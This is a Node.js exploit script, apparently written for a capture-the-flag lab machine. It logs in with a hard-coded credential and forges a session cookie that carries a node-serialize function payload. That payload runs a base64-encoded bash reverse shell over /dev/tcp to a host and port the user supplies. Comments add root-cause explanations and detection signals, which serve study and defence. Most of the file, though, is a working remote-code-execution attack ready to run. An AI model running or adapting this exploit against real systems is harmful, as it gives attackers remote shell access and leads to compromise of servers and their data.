unserialize_rce.js
#!/usr/bin/env node
const axios = require('axios')
// Account and target this script is hard-wired to. The address is in the
// 10.0.0.0/8 private range.
// NOTE(review): the credential is committed in plain text, so anyone who can
// read the repository learns it.
const user = 'admin'
const password = 'IppsecSaysPleaseSubscribe'
const baseUrl = 'http://10.10.11.139:5000'

// First two CLI arguments; both are undefined when omitted. They are later
// interpolated into a shell command line without any validation.
const lhost = process.argv[2]
const lport = process.argv[3]
/**
 * Logs in at `${baseUrl}/login` with the hard-coded account and returns the
 * session cookie the server issues.
 *
 * @returns {Promise<string>} First `Set-Cookie` header value of the response,
 *   attributes (everything after the first `;`) included.
 * @throws {TypeError} If the response has no `Set-Cookie` header, because the
 *   index access then runs on `undefined`.
 */
const login = async () => {
  const credentials = { user, password }
  const { headers } = await axios.post(`${baseUrl}/login`, credentials)
  const setCookie = headers['set-cookie']
  return setCookie[0]
}
/**
 * Sends one GET request to `baseUrl` carrying a modified copy of `cookie`.
 *
 * The modification appends an extra `"rce"` property whose value starts with
 * `_$$ND_FUNC$$_` (the prefix the node-serialize package uses to mark a string
 * as function source) and ends with `()`, so a server that feeds the cookie to
 * such a deserializer evaluates the function while deserializing.
 *
 * Defensive notes:
 * - Root cause is server-side: a client-controlled cookie reaches a
 *   deserializer that revives functions. Parsing the cookie as plain JSON and
 *   authenticating it (signature/MAC) before use removes the primitive.
 * - The marker survives on the wire as `_%24%24ND_FUNC%24%24_`, because
 *   `encodeURIComponent` escapes `$`; that string in a Cookie header is a
 *   usable detection signal.
 *
 * @param {string} cookie - `Set-Cookie` value as returned by `login()`.
 * @param {string} cmd - Text placed between single quotes inside the injected
 *   function source; it is not escaped here.
 * @returns {Promise<void>}
 */
const rce = async (cookie, cmd) => {
  // Position of the first cookie attribute separator.
  const attrStart = cookie.indexOf(';')

  // Drops the last three characters of the cookie value; presumably the
  // URL-encoded closing brace (`%7D`) of the serialized object, so the appended
  // fragment extends that object (TODO confirm against the server's cookie).
  const head = cookie.substring(0, attrStart - 3)
  const tail = cookie.substring(attrStart)

  const injected = encodeURIComponent(
    `,"rce":"_$$ND_FUNC$$_function() { require('child_process').exec('${cmd}') }()"}`
  )

  const forged = head + injected + tail
  await axios.get(baseUrl, { headers: { cookie: forged } })
}
/**
 * Builds the bash one-liner that opens an interactive shell over
 * `/dev/tcp/<lhost>/<lport>` and returns it base64-encoded.
 *
 * `lhost` and `lport` are interpolated exactly as given on the command line.
 * On the receiving host this shows up as a `bash -i` child of the Node process
 * with its descriptors redirected to a TCP socket, which process-lineage
 * monitoring can flag.
 *
 * @returns {string} Base64 text of the command line.
 */
const reverseShell = () => {
  const oneLiner = `bash -i >& /dev/tcp/${lhost}/${lport} 0>&1`
  return Buffer.from(oneLiner).toString('base64')
}
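/**
 * Entry point: checks the two CLI arguments, logs in, then sends the request
 * with the modified cookie.
 *
 * The command handed to `rce()` is `echo <base64> | base64 -d | bash`; a
 * `base64 -d | bash` pipeline spawned by a web application process is a
 * useful detection signal on the server side.
 *
 * @returns {Promise<void>}
 */
const main = async () => {
  if (!lhost || !lport) {
    // Usage errors go to stderr with a non-zero status so callers and scripts
    // can tell them apart from a successful run.
    console.error('[!] Usage: node unserialize_rce.js <lhost> <lport>')
    process.exit(1)
  }

  const cookie = await login()
  console.log('[+] Login successful')

  await rce(cookie, `echo ${reverseShell()} | base64 -d | bash`)
  console.log('[+] RCE completed')
}

// Handle the rejection instead of leaving the promise floating. Printing only
// the message avoids dumping the whole error object, which for an HTTP client
// error may include the request body and headers (credentials, cookie).
main().catch((err) => {
  console.error(`[!] ${err.message}`)
  process.exitCode = 1
})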